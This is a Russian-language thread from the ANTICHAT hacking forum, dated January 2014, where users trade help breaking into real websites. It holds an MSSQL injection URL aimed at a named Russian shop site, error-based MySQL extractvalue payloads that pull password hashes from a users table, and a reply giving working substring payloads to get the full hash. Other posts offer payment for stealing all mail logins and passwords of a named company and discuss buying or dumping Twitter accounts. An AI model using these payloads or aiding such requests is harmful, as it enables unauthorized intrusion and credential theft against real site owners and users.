HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.01.2014, 23:35
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от Xvir  
Ребята помогите раскрутить mssql не как не доходит!
http://www.ekb.spk.ru/spkekb/shop/prod_detail/_t_/prod=krug_nerzhaveyuschii
http://www.ekb.spk.ru/spkekb/shop/order.asp/_t_/prod=krug_nerzhaveyuschii'+or+1=(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('PrValues','SAP_Param5'))--
 
Ответить с цитированием

  #2  
Старый 09.01.2014, 18:04
Xvir
Новичок
Регистрация: 08.02.2011
Сообщений: 11
С нами: 8030486

Репутация: 0
По умолчанию

Друзья у кого нибудь есть желание за возногрождение поработать на этим сайтом tehkomplekt-ural.ru а именно мне нужно все логины и пассы почты их если что пишите в личку
 
Ответить с цитированием

  #3  
Старый 09.01.2014, 20:56
Massay
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами: 6940406

Репутация: 0
По умолчанию

Привет всем!)

Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида "

Цитата:
Сообщение от None  
and extractvalue(rand(),concat(0x3a,(select concat(0x3a,pass) from server.users limit 1,1))))--
"

Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
 
Ответить с цитированием

  #4  
Старый 09.01.2014, 21:26
Massay
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами: 6940406

Репутация: 0
По умолчанию

Да. но скрипт Hash Id эго тип хеша определить не может.

Цитата:
Сообщение от None  
46f94c8de14fb36680850768ff1b7f2
 
Ответить с цитированием

  #5  
Старый 09.01.2014, 21:42
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию

Цитата:
Сообщение от Massay  
Привет всем!)
Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида ""
Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
and extractvalue(rand(),concat(0x3a,(select mid(pass,1,31) from server.users limit 1,1))))--

and extractvalue(rand(),concat(0x3a,(select mid(pass,32,31) from server.users limit 1,1))))--

Цитата:
Сообщение от K800  
У этого хэша 31 символ, а не 32
У него еще символ на конкатенацию ушел
 
Ответить с цитированием

  #6  
Старый 09.01.2014, 21:55
Massay
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами: 6940406

Репутация: 0
По умолчанию

Спасибо большое!!!
 
Ответить с цитированием

  #7  
Старый 10.01.2014, 21:04
Vip77
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
С нами: 7167926

Репутация: 20
По умолчанию

Как использовать эту уязвимость ? http://vagosec.org/2013/12/wordpress-rce-exploit/
 
Ответить с цитированием

  #8  
Старый 11.01.2014, 00:42
websheff
Новичок
Регистрация: 28.10.2012
Сообщений: 3
С нами: 7126166

Репутация: 0
По умолчанию

Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
 
Ответить с цитированием

  #9  
Старый 11.01.2014, 01:08
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от websheff  
Подскажите в какую сторону копать по добыче акков твиттера. Все онлайн-магазы пишут что аккаунты с дампа. Не брут, не свежерег. Иньецкии в базы?
Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
 
Ответить с цитированием

  #10  
Старый 11.01.2014, 01:48
websheff
Новичок
Регистрация: 28.10.2012
Сообщений: 3
С нами: 7126166

Репутация: 0
По умолчанию

Цитата:
Сообщение от kingbeef  
Просто есть приватная уязвимость на сайте твиттера, которая позволяет каждый день сливать от туда по 50-100к акков.
получается все селлеры барижат одними и теми же акками? Или на каждого 50-100к акков?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.